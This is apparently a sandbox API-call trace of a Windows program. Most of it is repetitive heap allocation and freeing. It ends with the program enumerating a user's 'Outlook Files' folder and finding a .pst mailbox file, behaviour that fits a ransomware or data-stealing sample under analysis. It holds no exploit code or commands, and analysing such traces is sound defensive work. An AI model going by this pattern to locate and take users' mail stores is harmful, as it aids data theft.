[0170.435] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0170.435] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.435] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ebf0 | out: hHeap=0xcd0000) returned 1 [0170.435] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.435] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.435] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.435] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.435] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.435] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.435] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.435] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.435] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.435] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.435] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.435] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.435] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.435] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.435] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.435] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.435] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.435] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.435] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.435] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.435] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.435] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.436] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.436] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.437] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.437] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.437] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.437] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.437] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.437] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.437] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.437] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.437] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.437] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.437] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.437] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.437] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.437] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.437] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0170.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0170.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.440] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0170.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.441] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0170.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.442] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0170.442] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0170.442] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.442] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.442] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.442] PathFindFileNameW (pszPath="") returned="" [0170.443] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0170.443] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0170.443] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.443] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0170.443] PathFindExtensionW 